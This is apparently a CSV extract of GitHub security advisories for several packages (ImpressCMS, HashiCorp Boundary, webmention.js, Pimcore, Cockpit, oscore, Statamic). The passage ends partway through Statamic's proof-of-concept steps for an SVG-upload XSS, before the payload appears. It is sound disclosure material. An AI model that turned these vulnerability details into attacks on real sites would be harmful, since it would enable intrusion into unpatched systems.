scripting (XSS) vulnerability in ImpressCMS v1.4.5 and before allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the `smile_code` parameter of the component `/editprofile.php`.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'impresscms/impresscms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37785'}, {'type': 'WEB', 'url': 'https://github.com/CrownZTX/cve-description'}, {'type': 'PACKAGE', 'url': 'https://github.com/ImpressCMS/impresscms'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-13T19:56:13Z', 'nvd_published_at': None}" 1.4.0,GHSA-9vrm-v9xv-x3xr,2023-07-06T21:47:39Z,2023-07-06T19:24:09Z,,['CVE-2023-0690'],HashiCorp Boundary Workers Store Rotated Credentials in Plaintext Even When Key Management Service Configured,"HashiCorp Boundary from 0.10.0 through 0.11.2 contain an issue where when using a PKI-based worker with a Key Management Service (KMS) defined in the configuration file, new credentials created after an automatic rotation may not have been encrypted via the intended KMS. This would result in the credentials being stored in plaintext on the Boundary PKI worker’s disk. This issue is fixed in version 0.12.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/boundary'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.10.0'}, {'fixed': '0.12.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0690'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-03-boundary-workers-store-rotated-credentials-in-plaintext-even-when-key-management-service-configured/49907'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/boundary'}]","{'cwe_ids': ['CWE-311', 'CWE-312'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T21:47:39Z', 'nvd_published_at': '2023-02-08T19:15:00Z'}" 1.4.0,GHSA-r54g-4qq6-chxg,2023-07-14T21:50:30Z,2023-07-14T12:30:20Z,,['CVE-2023-3672'],webmention.js Cross-site Scripting vulnerability,webmention.js prior to 0.5.5 is vulnerable to cross-site scripting.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'webmention.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3672'}, {'type': 'WEB', 'url': 'https://github.com/plaidweb/webmention.js/commit/3551b66b3e40da37fee89ecf72930c5efdc53011'}, {'type': 'WEB', 'url': 'https://github.com/PlaidWeb/webmention.js/blob/9457e71433c0d2430bbe767ecc5b5837140d0ee4/static/webmention.js#L330'}, {'type': 'PACKAGE', 'url': 'https://github.com/plaidweb/webmention.js'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/75cfb7ad-a75f-45ff-8688-32a9c55179aa'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-14T21:50:30Z', 'nvd_published_at': None}" 1.4.0,GHSA-78q2-cv3p-x9fm,2023-07-21T20:17:53Z,2023-07-21T15:30:32Z,,['CVE-2023-3821'],Pimcore Cross-site Scripting vulnerability,Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.6.4.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.6.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3821'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/92811f07d39e4ad95c92003868f5f7309489d79c'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/599ba4f6-c900-4161-9127-f1e6a6e29aaa'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-21T20:17:53Z', 'nvd_published_at': None}" 1.4.0,GHSA-9r25-4j77-9wc7,2023-07-26T21:08:12Z,2023-07-20T21:30:59Z,,['CVE-2023-37649'],Cockpit CMS vulnerable to incorrect access control,Incorrect access control in the component `/models/Content` of Cockpit CMS v2.5.2 allows unauthorized attackers to access sensitive data.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'cockpit-hq/cockpit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37649'}, {'type': 'PACKAGE', 'url': 'https://github.com/Cockpit-HQ/Cockpit'}, {'type': 'WEB', 'url': 'https://github.com/Cockpit-HQ/Cockpit/releases/tag/2.6.0'}, {'type': 'WEB', 'url': 'https://www.ghostccamm.com/blog/multi_cockpit_vulns/'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-21T20:22:05Z', 'nvd_published_at': None}" 1.4.0,GHSA-859m-2pfx-fwhf,2023-08-03T19:39:23Z,2023-07-28T15:30:23Z,,['CVE-2023-39022'],Code injection in oscore,oscore v2.2.6 and below was discovered to contain a code injection vulnerability in the component com.opensymphony.util.EJBUtils.createStateless. This vulnerability is exploited via passing an unchecked argument.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'opensymphony:oscore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39022'}, {'type': 'WEB', 'url': 'https://github.com/LetianYuan/My-CVE-Public-References/tree/main/opensymphony_oscore'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-28T20:44:35Z', 'nvd_published_at': None}" 1.4.0,GHSA-6r5g-cq4q-327g,2023-07-06T20:56:28Z,2023-07-06T20:56:28Z,,['CVE-2023-36828'],Statamic's Antlers sanitizer cannot effectively sanitize malicious SVG,"Antlers sanitizer cannot effectively sanitize malicious SVG ### Summary The SVG tag does not sanitize malicious SVG. Therefore, an attacker can exploit this vulnerability to perform XSS attacks using SVG, even when using the `sanitize` function. ### Details Regarding the previous discussion mentioned [here](https://github.com/statamic/cms/security/advisories/GHSA-jvw9-rrc5-39g6#advisory-comment-84322), it has been identified that the default blacklist in the **FilesFieldtypeController** (located at this [link](https://github.com/statamic/cms/blob/f806b6b007ddcf066082eef175653c5beaa96d60/src/Http/Controllers/CP/Fieldtypes/FilesFieldtypeController.php#L15)) only blocks certain file extensions such as php, php3, php4, php5, and phtml. This allows a malicious user to upload a manipulated SVG file disguised as a social media icon, potentially triggering an XSS vulnerability. ### PoC Screenshot ![image](https://user-images.githubusercontent.com/17494868/251093022-15f949e9-2014-4069-850b-81940076745e.png) ### PoC 1. Create new Global set, let's say ""Settings"" 2. Create a ""Grid"" field in Blueprint (named: social), then add somefields Name (text), URL (text) and Icon (Assets) in the section Fields. 3. When calling the social setting in the `_footer.antlers.html`, remember to [sanitize](https://statamic.dev/modifiers/sanitize) ``` {{ settings:social }} {{ svg :src=""icon"" class=""h-6 w-6 hover:text-hot-pink"" | sanitize }} {{ /settings:social }} ``` 4. Upload the malicious SVG image, here is the code: ``` Statamic